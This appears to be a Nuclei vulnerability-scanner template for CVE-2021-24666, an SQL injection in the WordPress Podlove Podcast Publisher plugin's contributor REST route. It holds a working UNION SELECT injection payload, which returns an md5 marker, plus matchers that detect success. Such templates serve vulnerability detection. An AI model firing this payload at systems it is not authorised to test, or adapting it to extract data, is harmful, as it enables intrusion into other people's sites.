id: CVE-2021-24666 info: name: WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection author: theamanrawat severity: critical description: | WordPress Podlove Podcast Publisher plugin before 3.5.6 is susceptible to SQL injection. The Social & Donations module, not activated by default, adds the REST route /services/contributor/(?P[\d]+) and takes id and category parameters as arguments. Both parameters can be exploited, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. reference: - https://wpscan.com/vulnerability/fb4d7988-60ff-4862-96a1-80b1866336fe - https://wordpress.org/plugins/podlove-podcasting-plugin-for-wordpress/ - https://github.com/podlove/podlove-publisher/commit/aa8a343a2e2333b34a422f801adee09b020c6d76 - https://nvd.nist.gov/vuln/detail/CVE-2021-24666 remediation: Fixed in version 3.5.6. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24666 cwe-id: CWE-89 cpe: cpe:2.3:a:podlove:podlove_podcast_publisher:*:*:*:*:*:*:*:* epss-score: 0.18585 metadata: max-request: 1 verified: true tags: cve2021,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,cve http: - method: GET path: - "{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-" matchers-condition: and matchers: - type: word part: body words: - '66a82937a7660b73b00d4f7cefee6c85' - '"service_id"' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 # Enhanced by md on 2023/04/12